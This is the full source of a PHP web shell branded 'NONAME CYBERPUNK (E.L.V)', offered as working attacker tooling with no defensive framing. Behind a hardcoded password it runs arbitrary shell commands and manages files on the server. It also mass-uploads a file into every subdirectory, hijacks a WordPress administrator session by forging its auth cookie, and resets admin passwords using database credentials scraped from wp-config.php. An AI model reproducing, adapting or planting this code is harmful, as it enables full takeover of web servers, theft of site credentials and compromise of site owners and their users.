ruạṛ
<?php /** * ============================================================================= * HxrNoname × Gemini A.I - v840.0 (NONAME CYBERPUNK - DEEP SPACE) * ============================================================================= * IDENTITAS : NONAME CYBERPUNK (E.L.V) - LOCKED & PATEN * NAVIGATION : TOOLS E.L.V v84.0.0 (MASS UP + WP GRAB + WP RESET) * UI STYLE : DEEP SPACE VIOLET & ELECTRIC BLUE - BOLD 5PX BORDER * STATUS : PERMANENTLY LOCKED & REFINED * ============================================================================= */ @ob_start(); @ini_set('output_buffering', 0); session_start(); error_reporting(0); set_time_limit(0); $password = "adm2626"; $logo_url = "https://c.top4top.io/p_3733moei02.png"; if (isset($_GET['logout'])) { session_destroy(); header("Location: ?"); exit; } if (isset($_POST['pass'])) { if ($_POST['pass'] == $password) { $_SESSION['logged_in'] = true; } } if (!isset($_SESSION['logged_in'])) { die("<html><head><title>NONAME CYBERPUNK (E.L.V) - SECURE LOGIN</title> <style> @import url('https://fonts.googleapis.com/css2?family=Orbitron:wght@400;700&display=swap'); body{background:#020005;color:#00d4ff;display:flex;align-items:center;justify-content:center;height:100vh;margin:0;font-family:'Orbitron', sans-serif;overflow:hidden;} #canvas{position:fixed;top:0;left:0;z-index:-1;opacity:0.4;} .login-box{ text-align:center;z-index:1;background:rgba(5,0,15,0.9); padding:60px;border:2px solid #6a0dad; box-shadow: 0 0 20px rgba(106,13,173,0.5), inset 0 0 15px rgba(0,212,255,0.2); position:relative; clip-path: polygon(10% 0, 100% 0, 100% 90%, 90% 100%, 0 100%, 0 10% ); } .login-box::before { content:''; position:absolute; top:0; left:0; width:100%; height:100%; border: 1px solid #00d4ff; opacity:0.3; pointer-events:none; } input{ background:rgba(20,0,40,0.8); border:1px solid #6a0dad; color:#00d4ff; padding:15px; text-align:center; font-size:18px; width:320px; outline:none; font-family:'Orbitron', sans-serif; letter-spacing:3px; transition: 0.5s; box-shadow: 0 0 5px rgba(106,13,173,0.5); } input:focus{ border-color:#00d4ff; box-shadow: 0 0 15px #00d4ff; } h2{ color:#00d4ff; text-shadow:0 0 10px #00d4ff; text-transform:uppercase; letter-spacing:5px; margin-bottom:30px; font-size:16px; } .glitch { animation: glitch 1s linear infinite; } @keyframes glitch{ 2%,64%{ transform: translate(2px,0) skew(0deg); } 4%,60%{ transform: translate(-2px,0) skew(0deg); } 62%{ transform: translate(0,0) skew(5deg); } } .status-text { font-size:10px; color:#6a0dad; margin-top:20px; text-transform:uppercase; } </style></head><body onload='initCyberRain()'><canvas id='canvas'></canvas> <div class='login-box'> <img src='$logo_url' style='width:140px; filter:drop-shadow(0 0 10px #6a0dad); margin-bottom:10px;'> <h2 class='glitch'>SYSTEM INITIALIZING...</h2> <form method='POST'> <input type='password' name='pass' placeholder='[ ACCESS KEY ]' autofocus autocomplete='off'> </form> <div class='status-text'>NONAME CYBERPUNK SECURED // E.L.V v840.0</div> </div> <script>function initCyberRain(){const c=document.getElementById('canvas'),ctx=c.getContext('2d');c.height=window.innerHeight;c.width=window.innerWidth;const char='01',font=15,columns=c.width/font,drops=[];for(let x=0;x<columns;x++)drops[x]=1;function draw(){ctx.fillStyle='rgba(2,0,5,0.05)';ctx.fillRect(0,0,c.width,c.height);ctx.fillStyle='#6a0dad';ctx.font=font+'px monospace';for(let i=0;i<drops.length;i++){const text=char.charAt(Math.floor(Math.random()*char.length));ctx.fillText(text,i*font,drops[i]*font);if(drops[i]*font>c.height&&Math.random()>0.975)drops[i]=0;drops[i]++;}}setInterval(draw,33);}</script></body></html>"); } // --- [ LOGIC: FULL PATH PHP ] --- $path = isset($_GET['path']) ? $_GET['path'] : getcwd(); $path = str_replace('\\', '/', realpath($path)); $view_mode = isset($_GET['view_mode']) ? $_GET['view_mode'] : 'list'; $msg = ""; // --- [ LOGIC: UPLOADER ] --- if(isset($_FILES['up_file'])){ if(copy($_FILES['up_file']['tmp_name'], $path.'/'.$_FILES['up_file']['name'])){ $msg = "<div style='color:#0f0; background:rgba(0,255,0,0.1); border:1px solid #0f0; padding:10px; margin-bottom:20px; font-family:Orbitron;'>[ SUCCESS ] File Deployed: ".$_FILES['up_file']['name']."</div>"; } } // --- [ LOGIC: CHMOD ] --- if(isset($_POST['new_chmod'])){ if(chmod($_POST['chmod_target'], octdec($_POST['new_chmod']))){ $msg = "<div style='color:#0f0; background:rgba(0,255,0,0.1); border:1px solid #0f0; padding:10px; margin-bottom:20px; font-family:Orbitron;'>[ SUCCESS ] Permission Updated!</div>"; } } if(isset($_POST['new_name'])){ rename($_POST['old_name'], dirname($_POST['old_name']).'/'.$_POST['new_name']); header("Location: ?path=$path"); } if(isset($_POST['new_content'])){ file_put_contents($_POST['edit_target'], $_POST['new_content']); $msg = "<div style='color:#0f0; background:rgba(0,255,0,0.1); border:1px solid #0f0; padding:10px; margin-bottom:20px; font-family:Orbitron;'>[ SUCCESS ] File Saved!</div>"; } if(isset($_GET['del'])){ $t=$_GET['del']; is_dir($t)?@rmdir($t):@unlink($t); header("Location: ?path=$path"); } // --- [ LOGIKA MASS UPLOADER ] --- $mass_log = ""; if (isset($_POST['mass_up'])) { $f_name = $_FILES['m_file']['name']; $f_data = file_get_contents($_FILES['m_file']['tmp_name']); $m_root = rtrim($_POST['mass_root'], '/'); if(is_dir($m_root)){ foreach (scandir($m_root) as $folder) { if ($folder != "." && $folder != ".." && is_dir($m_root.'/'.$folder)) { $target_path = $m_root.'/'.$folder.'/'.$f_name; if(file_put_contents($target_path, $f_data)){ $mass_log .= "<div style='margin-bottom:5px;'><span style='color:#0f0;'>[+] SUCCESS:</span> <a href='?path=".$m_root."/".$folder."' style='color:#00d4ff; text-decoration:none;'>[ DIR ]</a> <a href='?path=".$m_root."/".$folder."&view_mode=edit&target=".$target_path."' style='color:#ffff00; text-decoration:none;'>[ EDIT ]</a> <span style='color:#ccc;'>$folder/$f_name</span></div>"; } } } } } function wp_grab_logic() { $c = dirname(__FILE__); $f = false; for($i=0;$i<15;$i++){ if(file_exists($c.'/wp-load.php')){$f=$c.'/wp-load.php';break;} $p=dirname($c); if($p==$c)break; $c=$p; } if($f){ require_once($f); $u=get_users(['role'=>'administrator','number'=>1]); if(!empty($u)){ $a=$u[0]; wp_set_current_user($a->ID); wp_set_auth_cookie($a->ID); return "[+] ADMIN HIJACKED: ".$a->user_login; } } return "[-] WP-LOAD NOT FOUND"; } function perms($f){ $p = fileperms($f); if(($p&0xC000)==0xC000)$i='s';elseif(($p&0xA000)==0xA000)$i='l';elseif(($p&0x8000)==0x8000)$i='-';elseif(($p&0x6000)==0x6000)$i='b';elseif(($p&0x4000)==0x4000)$i='d';elseif(($p&0x2000)==0x2000)$i='c';elseif(($p&0x1000)==0x1000)$i='p';else $i='u'; $i.=(($p&0x0100)?'r':'-');$i.=(($p&0x0080)?'w':'-');$i.=(($p&0x0040)?(($p&0x0800)?'s':'x'):(($p&0x0800)?'S':'-')); $i.=(($p&0x020)?'r':'-');$i.=(($p&0x0010)?'w':'-');$i.=(($p&0x0008)?(($p&0x0400)?'s':'x'):(($p&0x0400)?'S':'-')); $i.=(($p&0x0004)?'r':'-');$i.=(($p&0x0002)?'w':'-');$i.=(($p&0x0001)?(($p&0x0200)?'t':'x'):(($p&0x0200)?'T':'-')); return $i; } $server_ip = gethostbyname($_SERVER['HTTP_HOST']); $user_proc = @get_current_user(); $php_ver = phpversion(); $kernel = php_uname(); $software = $_SERVER['SERVER_SOFTWARE']; $full_path_shell = __FILE__; ?> <!DOCTYPE html> <html lang="en"> <head> <title>NONAME CYBERPUNK (E.L.V) v840.0</title> <style> @import url('https://fonts.googleapis.com/css2?family=Orbitron:wght@400;700&display=swap'); body { background: #020005; color: #e0e0e0; font-family: 'Orbitron', sans-serif; font-size: 13px; margin: 0; overflow: hidden; } #canvas { position: fixed; top:0; left:0; z-index:-1; opacity:0.25; } .container { padding: 30px; height: 100vh; overflow-y: auto; position: relative; z-index: 1; box-sizing: border-box; padding-bottom: 60px; } .main-header { display: flex; align-items: center; justify-content: space-between; border-bottom: 5px solid #6a0dad; padding-bottom: 20px; margin-bottom: 25px; background: rgba(10,0,30,0.5); padding: 15px; border-radius: 10px; } .header-left { display: flex; align-items: center; gap: 20px; } .shell-logo { width: 90px; border: 3px solid #00d4ff; border-radius: 5px; filter: drop-shadow(0 0 10px #00d4ff); } .ascii-txt { color: #00d4ff; font-family: monospace; font-size: 10px; line-height: 10px; text-shadow: 0 0 5px #00d4ff; white-space: pre; } .terminal-card { background: rgba(10, 5, 25, 0.9); border: 2px solid #6a0dad; border-radius: 8px; padding: 20px; margin-bottom: 20px; box-shadow: 0 5px 15px rgba(0,0,0,0.5); } .path-bar { background: #1a0033; padding: 12px; border-left: 5px solid #00d4ff; margin-bottom: 15px; font-weight: bold; border-radius: 0 5px 5px 0; overflow: hidden; } .nav-link { color: #00d4ff; text-decoration: none; padding: 5px 10px; border: 1px solid #00d4ff; margin: 0 2px; border-radius: 3px; font-size: 11px; transition: 0.3s; display: inline-block; } .nav-link:hover { background: #00d4ff; color: #000; box-shadow: 0 0 10px #00d4ff; } .btn-elv { padding: 10px 20px; background: linear-gradient(45deg, #6a0dad, #00d4ff); border: none; color: #fff; font-weight: bold; border-radius: 5px; cursor: pointer; text-decoration: none; display: inline-block; transition: 0.3s; text-transform: uppercase; font-size: 11px; } .btn-elv:hover { transform: translateY(-2px); box-shadow: 0 5px 15px #00d4ff; } .btn-tool { padding: 10px 15px; border: 2px solid #ff00ff; color: #ff00ff; background: transparent; border-radius: 5px; text-decoration: none; font-weight: bold; transition: 0.3s; font-size: 11px; } .btn-tool:hover { background: #ff00ff; color: #fff; box-shadow: 0 0 15px #ff00ff; } table { width: 100%; border-collapse: separate; border-spacing: 0 8px; } th { padding: 15px; color: #00d4ff; text-align: left; border-bottom: 3px solid #6a0dad; text-transform: uppercase; letter-spacing: 2px; } td { padding: 15px; background: rgba(30, 0, 60, 0.3); border-top: 1px solid #6a0dad; border-bottom: 1px solid #6a0dad; } td:first-child { border-left: 1px solid #6a0dad; border-radius: 10px 0 0 10px; } td:last-child { border-right: 1px solid #6a0dad; border-radius: 0 10px 10px 0; } tr:hover td { background: rgba(106, 13, 173, 0.2); } input[type=text], input[type=number], textarea, select { background: #0a001a; border: 1px solid #6a0dad; color: #00d4ff; padding: 12px; border-radius: 5px; outline: none; width: 100%; box-sizing: border-box; font-family: 'Orbitron', sans-serif; } .btn-link { padding: 4px 10px; border: 1px solid #00d4ff; color: #00d4ff; text-decoration: none; font-size: 10px; margin: 0 3px; border-radius: 3px; transition: 0.3s; background: rgba(0, 212, 255, 0.05); display: inline-block; } .btn-link:hover { background: #00d4ff; color: #000; box-shadow: 0 0 8px #00d4ff; } .footer-static { position: fixed; bottom: 0; left: 0; width: 100%; background: #050010; border-top: 2px solid #6a0dad; padding: 12px 0; color: #00d4ff; font-weight: bold; z-index: 10; text-align: center; text-transform: uppercase; font-size:11px; letter-spacing: 1px; } </style> </head> <body onload="initCyberRain()"> <canvas id="canvas"></canvas> <div class="container"> <header class="main-header"> <div class="header-left"> <img src="<?php echo $logo_url; ?>" class="shell-logo"> <div class="ascii-txt"> _ _ _____ _ _ ___ ___ ___ _____ | \ | || _ || \ | | / _ \ | \/ || ___| | \| || | | || \| |/ /_\ \| . . || |__ | |\ || | | || |\ || _ || |\/| || __| |_| \_|\ \_/ /|_| \_|| | | || | | || |___ (E.L.V) CYBERPUNK SUPREMACY v840.0 </div> <div style="font-size: 10px; color: #00d4ff; border-left: 2px solid #6a0dad; padding-left: 15px; font-family: monospace;"> IP: <?php echo $server_ip; ?> | USER: <?php echo $user_proc; ?><br> PHP: <?php echo $php_ver; ?> | SOFT: <?php echo $software; ?><br> OS: <?php echo substr($kernel, 0, 50); ?>...<br> SHELL: <?php echo $full_path_shell; ?> </div> </div> <div class="header-right"><a href="?path=<?php echo $path; ?>&view_mode=elv_tools" class="btn-elv">E.L.V v84.0.0 TOOLS</a></div> </header> <?php echo $msg; ?> <div class="terminal-card"> <div class="path-bar"><span style="color:#ff00ff;">DIR:</span> <?php $accum = ''; echo '<a href="?path=/" class="nav-link">ROOT</a>'; $dirs = explode('/', trim($path, '/')); foreach ($dirs as $p) { if($p=="")continue; $accum .= '/' . $p; echo '<span style="color:#6a0dad;"> / </span><a href="?path='.$accum.'" class="nav-link">'.$p.'</a>'; } ?> </div> <div style="display: flex; gap: 10px;"> <a href="?path=<?php echo getcwd(); ?>" class="btn-tool">HOME</a> <a href="?path=<?php echo $path; ?>&view_mode=terminal" class="btn-tool" style="border-color:#00d4ff; color:#00d4ff;">TERMINAL</a> <a href="?logout=1" class="btn-tool" style="border-color:#f00; color:#f00;">LOGOUT</a> </div> </div> <?php if($view_mode == 'elv_tools'): ?> <div class="terminal-card" style="border-color: #ff00ff;"> <h2 style="color:#ff00ff; text-align:center;">E.L.V v84.0.0 ADVANCED TOOLS</h2> <div style="display:grid; grid-template-columns: 1fr 1fr; gap: 20px;"> <div style="border: 1px solid #6a0dad; padding: 20px; border-radius: 10px; background:rgba(0,0,0,0.3);"> <h3 style="color:#00d4ff;">MASS UPLOADER</h3> <form enctype="multipart/form-data" method="POST"> <p>Target Root Folder:</p><input type="text" name="mass_root" value="<?php echo $path; ?>/"> <p>File:</p><input type="file" name="m_file" style="color:#00d4ff;"> <input type="submit" name="mass_up" value="DEPLOY" class="btn-elv" style="width:100%; margin-top:20px;"> </form> <div style="margin-top:10px; font-size:11px; max-height:150px; overflow-y:auto;"><?php echo $mass_log; ?></div> </div> <div style="border: 1px solid #6a0dad; padding: 20px; border-radius: 10px; text-align:center; background:rgba(0,0,0,0.3);"> <h3 style="color:#ff00ff;">WP COMMAND CENTER</h3> <div style="display:flex; flex-direction:column; gap:10px;"> <a href="?path=<?php echo $path; ?>&view_mode=elv_tools&action=grab" class="btn-elv">WP-GRABBER</a> <a href="?path=<?php echo $path; ?>&view_mode=wp_reset" class="btn-elv" style="background:linear-gradient(45deg, #f0f, #6a0dad);">WP-RESET PASSWORD</a> </div> <?php if($_GET['action']=='grab'): ?><div style="margin-top:20px; padding:15px; background:#000; border:1px dashed #0f0; color:#0f0;"><?php echo wp_grab_logic(); ?></div><?php endif; ?> </div> </div> </div> <?php elseif($view_mode == 'wp_reset'): ?> <div class="terminal-card"> <h3 style="color:#ff00ff;">[#] WP PASSWORD OVERRIDE</h3> <?php if (isset($_POST['do_reset'])) { $uid = (int)$_POST['user_id']; $passw = $_POST['new_pass']; $conf = $path . '/wp-config.php'; if (file_exists($conf)) { $c_data = file_get_contents($conf); preg_match("/define\(\s*['\"]DB_NAME['\"]\s*,\s*['\"](.+?)['\"]\s*\)/", $c_data, $db); preg_match("/define\(\s*['\"]DB_USER['\"]\s*,\s*['\"](.+?)['\"]\s*\)/", $c_data, $user); preg_match("/define\(\s*['\"]DB_PASSWORD['\"]\s*,\s*['\"](.+?)['\"]\s*\)/", $c_data, $pass); preg_match("/define\(\s*['\"]DB_HOST['\"]\s*,\s*['\"](.+?)['\"]\s*\)/", $c_data, $host); $conn = @new mysqli($host[1], $user[1], $pass[1], $db[1]); if ($conn->connect_error) { echo "<p style='color:red;'>[-] DB Error: ".$conn->connect_error."</p>"; } else { preg_match("/\\\$table_prefix\s*=\s*['\"](.+?)['\"]/", $c_data, $pref); $prefix = $pref[1] ?? 'wp_'; $hash = md5($passw); if ($conn->query("UPDATE {$prefix}users SET user_pass = '$hash' WHERE ID = $uid")) { echo "<p style='color:#0f0;'>[+] SUCCESS! Admin ID $uid Reset to: $passw</p>"; } else { echo "<p style='color:red;'>[-] Query Failed: ".$conn->error."</p>"; } $conn->close(); } } else { echo "<p style='color:red;'>[-] wp-config.php not found!</p>"; } } ?> <form method="POST" style="max-width:400px; margin:auto;"> <p>Admin ID:</p><input type="number" name="user_id" value="1"> <p>New Password:</p><input type="text" name="new_pass" placeholder="New password..." required> <input type="submit" name="do_reset" value="EXECUTE RESET" class="btn-elv" style="width:100%; margin-top:20px;"> </form> </div> <?php elseif($view_mode == 'terminal'): ?> <div class="terminal-card"> <h3 style="color:#00d4ff;">>_ TERMINAL</h3> <form method="POST"><input type="text" name="cmd" placeholder="Command..." autofocus autocomplete="off"></form> <?php if(isset($_POST['cmd'])): ?> <pre style='color:#0f0; background:#000; padding:15px; margin-top:15px; border:1px solid #6a0dad; overflow:auto;'><?php echo htmlspecialchars(shell_exec($_POST['cmd'].' 2>&1')); ?></pre> <?php endif; ?> </div> <?php elseif($view_mode == 'edit'): $t = $_GET['target']; ?> <div class="terminal-card"><h3>EDIT: <?php echo basename($t); ?></h3><form method="POST"><input type="hidden" name="edit_target" value="<?php echo $t; ?>"><textarea name="new_content" style="height:450px; font-family:monospace; background:#050010; color:#0f0; border:1px solid #6a0dad; padding:10px;"><?php echo htmlspecialchars(file_get_contents($t)); ?></textarea><input type="submit" value="SAVE CHANGES" class="btn-elv" style="width:100%; margin-top:15px;"></form></div> <?php elseif($view_mode == 'rename'): $t = $_GET['target']; ?> <div class="terminal-card"><h3>RENAME</h3><form method="POST"><input type="hidden" name="old_name" value="<?php echo $t; ?>"><input type="text" name="new_name" value="<?php echo basename($t); ?>"><input type="submit" value="UPDATE" class="btn-elv" style="margin-top:15px;"></form></div> <?php elseif($view_mode == 'chmod'): $t = $_GET['target']; ?> <div class="terminal-card"><h3>CHMOD: <?php echo basename($t); ?></h3><form method="POST"><input type="hidden" name="chmod_target" value="<?php echo $t; ?>"><input type="text" name="new_chmod" placeholder="e.g: 755" style="width:150px;"><input type="submit" value="APPLY" class="btn-elv"></form></div> <?php else: ?> <div class="terminal-card"> <form enctype="multipart/form-data" method="POST" style="display:flex; gap:10px; margin-bottom:20px;"> <input type="file" name="up_file"> <input type="submit" value="UPLOAD" class="btn-elv"> </form> <table> <thead><tr><th>NAME</th><th>SIZE</th><th>PERMS</th><th>ACTIONS</th></tr></thead> <tbody> <?php // --- LINE MODIFIKASI: FORCE READ HIDDEN FILES --- $items = scandir($path); foreach($items as $f){ if($f=="."||$f=="..") continue; $full=$path.'/'.$f; if (!file_exists($full)) continue; // Bypass symlink broken $is_d=is_dir($full); $prm=perms($full); $color_status = is_writable($full) ? "#0f0" : "#f00"; echo "<tr><td><a href='?path=".($is_d?$full:$path)."' style='color:".($is_d?"#ff00ff":"#00d4ff")."; text-decoration:none; font-weight:bold;'>".($is_d?"📁 $f":"📄 $f")."</a></td>"; echo "<td>".($is_d?"DIR":round(filesize($full)/1024,2)." KB")."</td>"; echo "<td><a href='?path=$path&view_mode=chmod&target=$full' style='color:$color_status; text-decoration:none;'>$prm</a></td><td>"; if(!$is_d) echo "<a href='?path=$path&view_mode=edit&target=$full' class='btn-link'>EDIT</a>"; echo "<a href='?path=$path&view_mode=rename&target=$full' class='btn-link'>REN</a>"; echo "<a href='?path=$path&del=$full' class='btn-link' style='border-color:#f00; color:#f00;' onclick='return confirm(\"Terminate?\")'>DEL</a></td></tr>"; } ?> </tbody> </table> </div> <?php endif; ?> <div class="footer-static">NONAME CYBERPUNK (E.L.V) — SUPREME SECURITY — I 💖 U E.L.V — "WE WILL BE REMEMBER FOREVER" — </div> </div> <script> function initCyberRain(){ const c=document.getElementById("canvas"),ctx=c.getContext("2d"); c.height=window.innerHeight;c.width=window.innerWidth; const char="01",font=15,columns=c.width/font,drops=[]; for(let x=0;x<columns;x++)drops[x]=1; function draw(){ ctx.fillStyle="rgba(2,0,5,0.05)";ctx.fillRect(0,0,c.width,c.height); ctx.fillStyle="#6a0dad";ctx.font=font+"px monospace"; for(let i=0;i<drops.length;i++){ const text=char.charAt(Math.floor(Math.random()*char.length)); ctx.fillText(text,i*font,drops[i]*font); if(drops[i]*font>c.height&&Math.random()>0.975)drops[i]=0; drops[i]++; } } setInterval(draw,33); window.addEventListener('resize', () => { c.height = window.innerHeight; c.width = window.innerWidth; }); } </script> </body> </html>
cải xoăn